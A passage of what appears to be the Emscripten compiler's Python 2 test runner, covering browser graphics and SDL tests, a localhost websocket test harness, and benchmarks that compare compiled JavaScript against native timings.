self.btest('cubegeom.c', args=['-O2', '-g'], expected=['188641320', '1522377227', '-1054007155', '-1111866053'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', args=['-O2', '--closure', '1'], expected=['188641320', '1522377227', '-1054007155', '-1111866053'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', expected=['588472350', '-687660609', '-818120875'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', expected=['752917084', '-251570256', '-291655550'])
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', expected=['752917084', '-251570256', '-291655550'])
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', expected=['752917084', '-251570256', '-291655550'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', expected=['752917084', '-251570256', '-291655550'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', expected=['-218745386', '-263951846', '-375182658'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', expected=['1757386625', '-677777235', '-690699597'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', expected=['-457159152', '910983047', '870576921']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', expected=['1121999515', '-391668088', '-522128354'])
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', expected=['1297500583', '-791216738', '-783804685'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', expected=['1617140399', '-898782526', '-946179526'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', expected=['-790445118'])
def test_cube_explosion(self):
self.btest('cube_explosion.c', expected=['667220544', '-1543354600', '-1485258415'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds'])
def test_s3tc_crunch(self):
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'], stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js'])
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--pre-run', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js'])
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png')
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png')
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png')
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png')
def test_runtimelink(self):
return self.skip('shared libs are deprecated')
main, supp = self.setup_runtimelink_test()
open(self.in_dir('supp.cpp'), 'w').write(supp)
Popen([PYTHON, EMCC, self.in_dir('supp.cpp'), '-o', 'supp.js', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'BUILD_AS_SHARED_LIB=2', '-O2', '-s', 'ASM_JS=0']).communicate()
shutil.move(self.in_dir('supp.js'), self.in_dir('supp.so'))
self.btest(main, args=['-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'RUNTIME_LINKED_LIBS=["supp.so"]', '-DBROWSER=1', '-O2', '-s', 'ASM_JS=0'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js'])
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
pids_to_clean = []
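  # Kill helper processes (socket servers, websockify proxies) spawned by the
  # websocket tests: first politely with SIGTERM, then with SIGKILL.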
def clean_pids(self):
import signal, errno
def pid_exists(pid):
try:
# NOTE: may just kill the process in Windows
os.kill(pid, 0)
except OSError, e:
return e.errno == errno.EPERM
else:
return True
def kill_pids(pids, sig):
for pid in pids:
if not pid_exists(pid):
break
print '[killing %d]' % pid
try:
os.kill(pid, sig)
print '[kill succeeded]'
except:
print '[kill fail]'
# ask nicely (to try and catch the children)
kill_pids(browser.pids_to_clean, signal.SIGTERM)
time.sleep(1)
# extreme prejudice, may leave children
kill_pids(browser.pids_to_clean, signal.SIGKILL)
browser.pids_to_clean = []
  # Runs a websocket harness at a specific port: `port` is the raw TCP socket we forward to, and port+1 is the websockify proxy the page connects to
class WebsockHarness:
def __init__(self, port, server_func=None, no_server=False):
self.port = port
self.server_func = server_func
self.no_server = no_server
def __enter__(self):
import socket, websockify
if not self.no_server:
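        # Default server: accept connections on self.port and send a fixed byte
        # pattern whose contents the basic websocket test verifies.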
def server_func(q):
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", self.port))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
csock.send("te\x01\xff\x79st\x02")
server_func = self.server_func or server_func
server_queue = multiprocessing.Queue()
self.server = multiprocessing.Process(target=server_func, args=(server_queue,))
self.server.start()
browser.pids_to_clean.append(self.server.pid)
while True:
if not server_queue.empty():
spid = server_queue.get()
if spid:
browser.pids_to_clean.append(spid)
break
time.sleep(0.1)
print '[Socket server on processes %s]' % str(browser.pids_to_clean[-2:])
def websockify_func(wsp): wsp.start_server()
print >> sys.stderr, 'running websockify on %d, forward to tcp %d' % (self.port+1, self.port)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.port+1, target_host="127.0.0.1", target_port=self.port, run_once=True)
self.websockify = multiprocessing.Process(target=websockify_func, args=(wsp,))
self.websockify.start()
browser.pids_to_clean.append(self.websockify.pid)
print '[Websockify on processes %s]' % str(browser.pids_to_clean[-2:])
def __exit__(self, *args, **kwargs):
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
def test_websockets(self):
try:
with self.WebsockHarness(8990):
self.btest('websockets.c', expected='571')
finally:
self.clean_pids()
def test_websockets_partial(self):
def partial(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8990))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
csock.send("\x09\x01\x02\x03\x04\x05\x06\x07\x08\x09")
csock.send("\x08\x01\x02\x03\x04\x05\x06\x07\x08")
csock.send("\x07\x01\x02\x03\x04\x05\x06\x07")
csock.send("\x06\x01\x02\x03\x04\x05\x06")
csock.send("\x05\x01\x02\x03\x04\x05")
csock.send("\x04\x01\x02\x03\x04")
csock.send("\x03\x01\x02\x03")
csock.send("\x02\x01\x02")
csock.send("\x01\x01")
try:
with self.WebsockHarness(8990, partial):
self.btest('websockets_partial.c', expected='165')
finally:
self.clean_pids()
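  # Returns a server function that launches tests/socket_relay.py to forward
  # traffic between port1 and port2, registering its pid for later cleanup.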
def make_relay_server(self, port1, port2):
def relay_server(q):
print >> sys.stderr, 'creating relay server on ports %d,%d' % (port1, port2)
proc = Popen([PYTHON, path_from_root('tests', 'socket_relay.py'), str(port1), str(port2)])
q.put(proc.pid)
proc.communicate()
return relay_server
def test_websockets_bi(self):
for datagram in [0,1]:
for fileops in [0,1]:
try:
print >> sys.stderr, 'test_websocket_bi datagram %d, fileops %d' % (datagram, fileops)
with self.WebsockHarness(8992, self.make_relay_server(8992, 8994)):
with self.WebsockHarness(8994, no_server=True):
Popen([PYTHON, EMCC, path_from_root('tests', 'websockets_bi_side.c'), '-o', 'side.html', '-DSOCKK=8995', '-DTEST_DGRAM=%d' % datagram]).communicate()
self.btest('websockets_bi.c', expected='2499', args=['-DSOCKK=8993', '-DTEST_DGRAM=%d' % datagram, '-DTEST_FILE_OPS=%s' % fileops])
finally:
self.clean_pids()
def test_websockets_bi_listen(self):
try:
with self.WebsockHarness(6992, self.make_relay_server(6992, 6994)):
with self.WebsockHarness(6994, no_server=True):
Popen([PYTHON, EMCC, path_from_root('tests', 'websockets_bi_side.c'), '-o', 'side.html', '-DSOCKK=6995']).communicate()
self.btest('websockets_bi_listener.c', expected='2499', args=['-DSOCKK=6993'])
finally:
self.clean_pids()
def test_websockets_gethostbyname(self):
try:
with self.WebsockHarness(7000):
self.btest('websockets_gethostbyname.c', expected='571', args=['-O2'])
finally:
self.clean_pids()
def test_websockets_bi_bigdata(self):
try:
with self.WebsockHarness(3992, self.make_relay_server(3992, 3994)):
with self.WebsockHarness(3994, no_server=True):
Popen([PYTHON, EMCC, path_from_root('tests', 'websockets_bi_side_bigdata.c'), '-o', 'side.html', '-DSOCKK=3995', '-s', 'SOCKET_DEBUG=0', '-I' + path_from_root('tests')]).communicate()
self.btest('websockets_bi_bigdata.c', expected='0', args=['-DSOCKK=3993', '-s', 'SOCKET_DEBUG=0', '-I' + path_from_root('tests')])
finally:
self.clean_pids()
def test_websockets_select_server_down(self):
def closedServer(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8994))
try:
with self.WebsockHarness(8994, closedServer):
self.btest('websockets_select.c', expected='266')
finally:
self.clean_pids()
def test_websockets_select_server_closes_connection(self):
def closingServer(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8994))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
csock.send("1234567")
csock.close()
try:
with self.WebsockHarness(8994, closingServer):
self.btest('websockets_select_server_closes_connection.c', expected='266')
finally:
self.clean_pids()
def test_websockets_select_server_closes_connection_rw(self):
def closingServer_rw(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8998))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
readArray = bytearray(10)
#readBuffer = buffer(readArray)
bytesRead = 0
# Let the client start to write data
while (bytesRead < 10):
          (readBytes, address) = csock.recvfrom_into(readArray, 10)
bytesRead += readBytes
print "server: 10 bytes read"
# Now we write a message on our own ...
csock.send("0123456789")
print "server: 10 bytes written"
# And immediately close the connection
csock.close()
print "server: connection closed"
try:
with self.WebsockHarness(8998, closingServer_rw):
self.btest('websockets_select_server_closes_connection_rw.c', expected='266')
finally:
self.clean_pids()
def test_enet(self):
try_delete(self.in_dir('enet'))
shutil.copytree(path_from_root('tests', 'enet'), self.in_dir('enet'))
pwd = os.getcwd()
os.chdir(self.in_dir('enet'))
Popen([PYTHON, path_from_root('emconfigure'), './configure']).communicate()
Popen([PYTHON, path_from_root('emmake'), 'make']).communicate()
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I'+path_from_root('tests', 'enet', 'include')]
os.chdir(pwd)
Popen([PYTHON, EMCC, path_from_root('tests', 'enet_server.c'), '-o', 'server.html'] + enet).communicate()
try:
with self.WebsockHarness(1234, self.make_relay_server(1234, 1236)):
with self.WebsockHarness(1236, no_server=True):
self.btest('enet_client.c', expected='0', args=enet)
finally:
self.clean_pids()
elif 'benchmark' in str(sys.argv):
# Benchmarks. Run them with argument |benchmark|. To run a specific test, do
# |benchmark.test_X|.
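  # Fingerprint the benchmark environment: timestamp, emscripten git revision,
  # SpiderMonkey hg tip (if available) and the LLVM path in use.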
fingerprint = [time.asctime()]
try:
fingerprint.append('em: ' + Popen(['git', 'show'], stdout=PIPE).communicate()[0].split('\n')[0])
except:
pass
  d = os.getcwd()
  try:
    os.chdir(os.path.expanduser('~/Dev/mozilla-central'))
    fingerprint.append('sm: ' + filter(lambda line: 'changeset' in line,
                                       Popen(['hg', 'tip'], stdout=PIPE).communicate()[0].split('\n'))[0])
  except:
    pass
  finally:
    os.chdir(d)
fingerprint.append('llvm: ' + LLVM_ROOT)
print 'Running Emscripten benchmarks... [ %s ]' % ' | '.join(fingerprint)
sys.argv = filter(lambda x: x != 'benchmark', sys.argv)
assert(os.path.exists(CLOSURE_COMPILER))
try:
index = SPIDERMONKEY_ENGINE.index("options('strict')")
SPIDERMONKEY_ENGINE = SPIDERMONKEY_ENGINE[:index-1] + SPIDERMONKEY_ENGINE[index+1:] # closure generates non-strict
except:
pass
Building.COMPILER = CLANG
  # Pick the JS engine to benchmark. One can be specified explicitly, e.g.: python tests/runner.py benchmark SPIDERMONKEY_ENGINE
JS_ENGINE = JS_ENGINES[0]
for i in range(1, len(sys.argv)):
arg = sys.argv[i]
if not arg.startswith('benchmark.test_'):
JS_ENGINE = eval(arg)
sys.argv[i] = None
sys.argv = filter(lambda arg: arg is not None, sys.argv)
print 'Benchmarking JS engine:', ' '.join(JS_ENGINE)
Building.COMPILER_TEST_OPTS = []
TEST_REPS = 2
TOTAL_TESTS = 8
# standard arguments for timing:
# 0: no runtime, just startup
# 1: very little runtime
# 2: 0.5 seconds
# 3: 1 second
# 4: 5 seconds
# 5: 10 seconds
DEFAULT_ARG = '4'
tests_done = 0
total_times = map(lambda x: 0., range(TOTAL_TESTS))
total_native_times = map(lambda x: 0., range(TOTAL_TESTS))
class benchmark(RunnerCore):
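    # Print mean/std/median/range for the JS and native timings; on the final
    # call, print only the aggregate JS-to-native ratios.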
def print_stats(self, times, native_times, last=False, reps=TEST_REPS):
if reps == 0:
print '(no reps)'
return
mean = sum(times)/len(times)
squared_times = map(lambda x: x*x, times)
mean_of_squared = sum(squared_times)/len(times)
std = math.sqrt(mean_of_squared - mean*mean)
sorted_times = times[:]
sorted_times.sort()
median = sum(sorted_times[len(sorted_times)/2 - 1:len(sorted_times)/2 + 1])/2
mean_native = sum(native_times)/len(native_times)
squared_native_times = map(lambda x: x*x, native_times)
mean_of_squared_native = sum(squared_native_times)/len(native_times)
std_native = math.sqrt(mean_of_squared_native - mean_native*mean_native)
sorted_native_times = native_times[:]
sorted_native_times.sort()
median_native = sum(sorted_native_times[len(sorted_native_times)/2 - 1:len(sorted_native_times)/2 + 1])/2
final = mean / mean_native
if last:
norm = 0
for i in range(len(times)):
norm += times[i]/native_times[i]
norm /= len(times)
print
print ' JavaScript: %.3f Native: %.3f Ratio: %.3f Normalized ratio: %.3f' % (mean, mean_native, final, norm)
return
print
print ' JavaScript: mean: %.3f (+-%.3f) secs median: %.3f range: %.3f-%.3f (noise: %3.3f%%) (%d runs)' % (mean, std, median, min(times), max(times), 100*std/mean, reps)
print ' Native : mean: %.3f (+-%.3f) secs median: %.3f range: %.3f-%.3f (noise: %3.3f%%) JS is %.2f X slower' % (mean_native, std_native, median_native, min(native_times), max(native_times), 100*std_native/mean_native, final)
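    # Compile `src` with emcc and run it `reps` times under JS_ENGINE, then build
    # and run the same source natively, collecting comparative timing statistics.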
def do_benchmark(self, name, src, expected_output='FAIL', args=[], emcc_args=[], native_args=[], shared_args=[], force_c=False, reps=TEST_REPS, native_exec=None, output_parser=None, args_processor=None):
args = args or [DEFAULT_ARG]
if args_processor: args = args_processor(args)
dirname = self.get_dir()
filename = os.path.join(dirname, name + '.c' + ('' if force_c else 'pp'))
f = open(filename, 'w')
f.write(src)
f.close()
final_filename = os.path.join(dirname, name + '.js')
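      # hardcode.py is the --js-transform script: it rewrites run() so that all
      # arguments except the last (the runtime-selected size) are baked into the JS.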
open('hardcode.py', 'w').write('''
def process(filename):
js = open(filename).read()
replaced = js.replace("run();", "run(%s.concat(Module[\\"arguments\\"]));")
assert js != replaced
open(filename, 'w').write(replaced)
import sys
process(sys.argv[1])
      ''' % str(args[:-1]) # do not hardcode the last argument, the default (size) arg
)
try_delete(final_filename)
output = Popen([PYTHON, EMCC, filename, #'-O3',
'-O2', '-s', 'DOUBLE_MODE=0', '-s', 'PRECISE_I64_MATH=0',
'--llvm-lto', '3', '--memory-init-file', '0', '--js-transform', 'python hardcode.py',
'-s', 'TOTAL_MEMORY=128*1024*1024',
'--closure', '1',
#'-g',
'-o', final_filename] + shared_args + emcc_args, stdout=PIPE, stderr=self.stderr_redirect).communicate()
assert os.path.exists(final_filename), 'Failed to compile file: ' + output[0]
# Run JS
global total_times, tests_done
times = []
for i in range(reps):
start = time.time()
js_output = run_js(final_filename, engine=JS_ENGINE, args=args, stderr=PIPE, full_output=True)
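        # the leading letter is dropped so both 'Successfully' and 'successfully' match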
if i == 0 and 'uccessfully compiled asm.js code' in js_output:
if 'asm.js link error' not in js_output:
print "[%s was asm.js'ified]" % name
if not output_parser:
curr = time.time()-start
else:
curr = output_parser(js_output)
times.append(curr)
total_times[tests_done] += curr
if i == 0:
# Sanity check on output
self.assertContained(expected_output, js_output)
# Run natively
if not native_exec:
self.build_native(filename, shared_args + native_args)
else:
shutil.copyfile(native_exec, filename + '.native')
shutil.copymode(native_exec, filename + '.native')
global total_native_times
native_times = []
for i in range(reps):
start = time.time()
native_output = self.run_native(filename, args)
if i == 0:
# Sanity check on output
self.assertContained(expected_output, native_output)
if not output_parser:
curr = time.time()-start
else:
curr = output_parser(native_output)
native_times.append(curr)
total_native_times[tests_done] += curr
self.print_stats(times, native_times, reps=reps)
#tests_done += 1
#if tests_done == TOTAL_TESTS:
# print 'Total stats:',
# self.print_stats(total_times, total_native_times, last=True)
def test_primes(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 33000; break;
case 2: arg = 130000; break;
case 3: arg = 220000; break;
case 4: arg = 610000; break;
case 5: arg = 1010000; break;
        default: printf("error: %d\n", arg); return -1;
}
int primes = 0, curri = 2;
while (primes < arg) {
int ok = true;
for (int j = 2; j < sqrtf(curri); j++) {
if (curri % j == 0) {
ok = false;
break;
}
}
if (ok) {
primes++;
}
curri++;
}
printf("lastprime: %d.\n", curri-1);
return 0;
}
'''
self.do_benchmark('primes', src, 'lastprime:')
def test_memops(self):
src = '''
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 1024*1024; M = 55; break;
case 2: N = 1024*1024; M = 400; break;
case 3: N = 1024*1024; M = 800; break;
case 4: N = 1024*1024; M = 4000; break;
case 5: N = 1024*1024; M = 8000; break;
default: printf("error: %d\\n", arg); return -1;
}
int final = 0;
char *buf = (char*)malloc(N);
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++)
buf[i] = (i + final)%256;
for (int i = 0; i < N; i++)
final += buf[i] & 1;
final = final % 1000;
}
printf("final: %d.\\n", final);
return 0;
}
'''
self.do_benchmark('memops', src, 'final:')
def zzztest_files(self):
src = r'''
#include<stdio.h>
#include<stdlib.h>
#include<assert.h>
#include <unistd.h>
int main() {
int N = 100;
int M = 1000;
int K = 1000;
unsigned char *k = (unsigned char*)malloc(K+1), *k2 = (unsigned char*)malloc(K+1);
for (int i = 0; i < K; i++) {
k[i] = (i % 250) + 1;
}
k[K] = 0;
char buf[100];
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "w");
for (int j = 0; j < M; j++) {
fwrite(k, 1, (j % K) + 1, f);
}
fclose(f);
}
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "r");
for (int j = 0; j < M; j++) {
fread(k2, 1, (j % K) + 1, f);
}
fclose(f);
for (int j = 0; j < K; j++) {
assert(k[j] == k2[j]);
}
unlink(buf);
}
printf("ok");
return 0;
}
'''
      self.do_benchmark('files', src, 'ok')
def test_copy(self):
src = r'''
#include<stdio.h>
struct vec {
int x, y, z;
int r, g, b;
vec(int x_, int y_, int z_, int r_, int g_, int b_) : x(x_), y(y_), z(z_), r(r_), g(g_), b(b_) {}
static vec add(vec a, vec b) {
return vec(a.x+b.x, a.y+b.y, a.z+b.z, a.r+b.r, a.g+b.g, a.b+b.b);
}
void norm() {
x %= 1024;
y %= 1024;
z %= 1024;
r %= 1024;
b %= 1024;
g %= 1024;
}
int sum() { return x + y + z + r + g + b; }
};
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 75; break;
case 2: arg = 625; break;
case 3: arg = 1250; break;
case 4: arg = 5*1250; break;
case 5: arg = 10*1250; break;
        default: printf("error: %d\n", arg); return -1;
}
int total = 0;
for (int i = 0; i < arg; i++) {
for (int j = 0; j < 50000; j++) {
vec c(i, i+i%10, j*2, i%255, j%120, i%15);
vec d(j+i%10, j*2, j%255, i%120, j%15, j);
vec e = c;
c.norm();
d.norm();
vec f = vec::add(c, d);
f = vec::add(e, f);
f.norm();
f = vec::add(d, f);
total += f.sum() % 100;
total %= 10240;
}
}
printf("sum:%d\n", total);
return 0;
}
'''
self.do_benchmark('copy', src, 'sum:')
def test_fannkuch(self):
src = open(path_from_root('tests', 'fannkuch.cpp'), 'r').read().replace(
'int n = argc > 1 ? atoi(argv[1]) : 0;',
'''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 9; break;
case 2: n = 10; break;
case 3: n = 11; break;
case 4: n = 11; break;
case 5: n = 12; break;
default: printf("error: %d\\n", arg); return -1;
}
'''
)
assert 'switch(arg)' in src
self.do_benchmark('fannkuch', src, 'Pfannkuchen(')
def test_corrections(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 20000; M = 550; break;
case 2: N = 20000; M = 3500; break;
case 3: N = 20000; M = 7000; break;
case 4: N = 20000; M = 5*7000; break;
case 5: N = 20000; M = 10*7000; break;
        default: printf("error: %d\n", arg); return -1;
}
unsigned int f = 0;
unsigned short s = 0;
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++) {
f += i / ((t % 5)+1);
if (f > 1000) f /= (t % 3)+1;
if (i % 4 == 0) f += i * (i % 8 == 0 ? 1 : -1);
s += (short(f)*short(f)) % 256;
}
}
printf("final: %d:%d.\n", f, s);
return 0;
}
'''
self.do_benchmark('corrections', src, 'final:', emcc_args=['-s', 'CORRECT_SIGNS=1', '-s', 'CORRECT_OVERFLOWS=1', '-s', 'CORRECT_ROUNDINGS=1'])
def fasta(self, name, double_rep, emcc_args=[]):
src = open(path_from_root('tests', 'fasta.cpp'), 'r').read().replace('double', double_rep)
src = src.replace(' const size_t n = ( argc > 1 ) ? atoi( argv[1] ) : 512;', '''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 19000000/20; break;
case 2: n = 19000000/2; break;
case 3: n = 19000000; break;
case 4: n = 19000000*5; break;
case 5: n = 19000000*10; break;
default: printf("error: %d\\n", arg); return -1;
}
''')
assert 'switch(arg)' in src
      self.do_benchmark(name, src, '', emcc_args=emcc_args)
def test_fasta_float(self):
self.fasta('fasta_float', 'float')
def test_fasta_double(self):
self.fasta('fasta_double', 'double')
def test_fasta_double_full(self):
self.fasta('fasta_double_full', 'double', emcc_args=['-s', 'DOUBLE_MODE=1'])
def test_skinning(self):
src = open(path_from_root('tests', 'skinning_test_no_simd.cpp'), 'r').read()
self.do_benchmark('skinning', src, 'blah=0.000000')
def test_life(self):
src = open(path_from_root('tests', 'life.c'), 'r').read()
self.do_benchmark('life', src, '''--------------------------------''', shared_args=['-std=c99'], force_c=True)
def test_linpack(self):
def output_parser(output):
return 100.0/float(re.search('Unrolled Double Precision +([\d\.]+) Mflops', output).group(1))
self.do_benchmark('linpack', open(path_from_root('tests', 'linpack.c')).read(), '''Unrolled Double Precision''', force_c=True, output_parser=output_parser)
def test_zzz_java_nbody(self): # tests xmlvm compiled java, including bitcasts of doubles, i64 math, etc.
args = [path_from_root('tests', 'nbody-java', x) for x in os.listdir(path_from_root('tests', 'nbody-java')) if x.endswith('.c')] + \
['-I' + path_from_root('tests', 'nbody-java')]
self.do_benchmark('nbody_java', '', '''Time(s)''',
force_c=True, emcc_args=args + ['-s', 'PRECISE_I64_MATH=1', '--llvm-lto', '2'], native_args=args + ['-lgc', '-std=c99', '-target', 'x86_64-pc-linux-gnu', '-lm'])
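    # Build lua from tests/lua, embed the chosen benchmark script, and compare
    # running it under JS against the natively built interpreter.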
def lua(self, benchmark, expected, output_parser=None, args_processor=None):
shutil.copyfile(path_from_root('tests', 'lua', benchmark + '.lua'), benchmark + '.lua')
#shutil.copyfile(path_from_root('tests', 'lua', 'binarytrees.lua'), 'binarytrees.lua')
#shutil.copyfile(path_from_root('tests', 'lua', 'scimark.lua'), 'scimark.lua')
